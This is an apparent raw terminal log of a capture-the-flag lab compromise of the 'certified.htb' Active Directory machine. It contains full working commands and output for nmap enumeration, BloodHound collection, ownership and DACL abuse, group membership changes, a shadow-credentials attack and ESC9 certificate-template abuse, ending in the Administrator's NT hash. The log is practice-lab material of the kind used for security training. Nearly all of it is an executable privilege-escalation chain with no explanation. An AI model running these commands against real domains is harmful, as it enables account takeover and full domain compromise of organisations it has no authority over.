┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# nmap $ip -sC -sV --min-rate=1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-28 07:49 UTC Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 91.67% done; ETC: 07:50 (0:00:04 remaining) Nmap scan report for certified.htb (10.10.11.41) Host is up (0.072s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-28 14:23:40Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-28T14:25:01+00:00; +6h33m40s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:04:20 |_Not valid after: 2105-05-23T21:04:20 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-09-28T14:25:02+00:00; +6h33m40s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:04:20 |_Not valid after: 2105-05-23T21:04:20 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:04:20 |_Not valid after: 2105-05-23T21:04:20 |_ssl-date: 2025-09-28T14:25:01+00:00; +6h33m40s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED | Not valid before: 2025-06-11T21:04:20 |_Not valid after: 2105-05-23T21:04:20 |_ssl-date: 2025-09-28T14:25:02+00:00; +6h33m40s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 90.45 seconds
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# bloodhound-python -d certified.htb -ns $ip -u "judith.mader" -p 'judith09' -c all --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: certified.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) INFO: Connecting to LDAP server: dc01.certified.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.certified.htb INFO: Found 10 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.certified.htb INFO: Done in 00M 14S INFO: Compressing output into 20250928075835_bloodhound.zip
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# bloodyAD -d certified.htb -u "judith.mader" -p 'judith09' --host $ip set owner management judith.mader [+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management ┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# impacket-dacledit -action write -rights 'FullControl' -principal judith.mader -target Management -dc-ip $ip 'certified.htb'/'judith.mader':'judith09' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250928-081023.bak [*] DACL modified successfully! ┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# net rpc group addmem Management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.10.11.41
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# net rpc group members Management -U "certified.htb"/"judith.mader"%"judith09" -S 10.10.11.41 CERTIFIED\judith.mader CERTIFIED\management_sv
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# certipy-ad shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.10.11.41 Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The resolution lifetime expired after 5.404 seconds: Server Do53:10.10.11.41@53 answered The DNS operation timed out.; Server Do53:10.10.11.41@53 answered The DNS operation timed out.; Server Do53:10.10.11.41@53 answered The DNS operation timed out. [!] Use -debug to print a stacktrace [*] Targeting user 'management_svc' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '77559f8d-a8d4-bc5d-39f7-b80467aba907' [*] Adding Key Credential with device ID '77559f8d-a8d4-bc5d-39f7-b80467aba907' to the Key Credentials for 'management_svc' [*] Successfully added Key Credential with device ID '77559f8d-a8d4-bc5d-39f7-b80467aba907' to the Key Credentials for 'management_svc' [*] Authenticating as 'management_svc' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'management_svc@certified.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'management_svc.ccache' [*] Wrote credential cache to 'management_svc.ccache' [*] Trying to retrieve NT hash for 'management_svc' [*] Restoring the old Key Credentials for 'management_svc' [*] Successfully restored the old Key Credentials for 'management_svc' [*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# certipy-ad find -dc-ip $ip -u 'ca_operator' -p 'Asd123123.' -vulnerable -stdout Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Finding issuance policies [*] Found 15 issuance policies [*] Found 0 OIDs linked to templates [*] Retrieving CA configuration for 'certified-DC01-CA' via RRP [*] Successfully retrieved CA configuration for 'certified-DC01-CA' [*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb' [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [!] Error checking web enrollment: timed out [!] Use -debug to print a stacktrace [*] Enumeration output: 。。。。。 Permissions Enrollment Permissions Enrollment Rights : CERTIFIED.HTB\operator ca CERTIFIED.HTB\Domain Admins CERTIFIED.HTB\Enterprise Admins Object Control Permissions Owner : CERTIFIED.HTB\Administrator Full Control Principals : CERTIFIED.HTB\Domain Admins CERTIFIED.HTB\Enterprise Admins Write Owner Principals : CERTIFIED.HTB\Domain Admins CERTIFIED.HTB\Enterprise Admins Write Dacl Principals : CERTIFIED.HTB\Domain Admins CERTIFIED.HTB\Enterprise Admins Write Property Enroll : CERTIFIED.HTB\Domain Admins CERTIFIED.HTB\Enterprise Admins [+] User Enrollable Principals : CERTIFIED.HTB\operator ca [!] Vulnerabilities ESC9 : Template has no security extension. [*] Remarks ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB. [!] Use -debug to print a stacktrace [*] Updating user 'ca_operator': userPrincipalName : Administrator [*] Successfully updated 'ca_operator'
[*] Requesting certificate via RPC [*] Request ID is 6 [*] Successfully requested certificate [*] Got certificate with UPN 'Administrator' [*] Certificate has no object SID [*] Try using -sid to set the object SID or see the wiki for more details [*] Saving certificate and private key to 'administrator.pfx' [*] Wrote certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/tmp/baji] └─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities: [*] SAN UPN: 'Administrator' [*] Using principal: 'administrator@certified.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'administrator.ccache' [*] Wrote credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34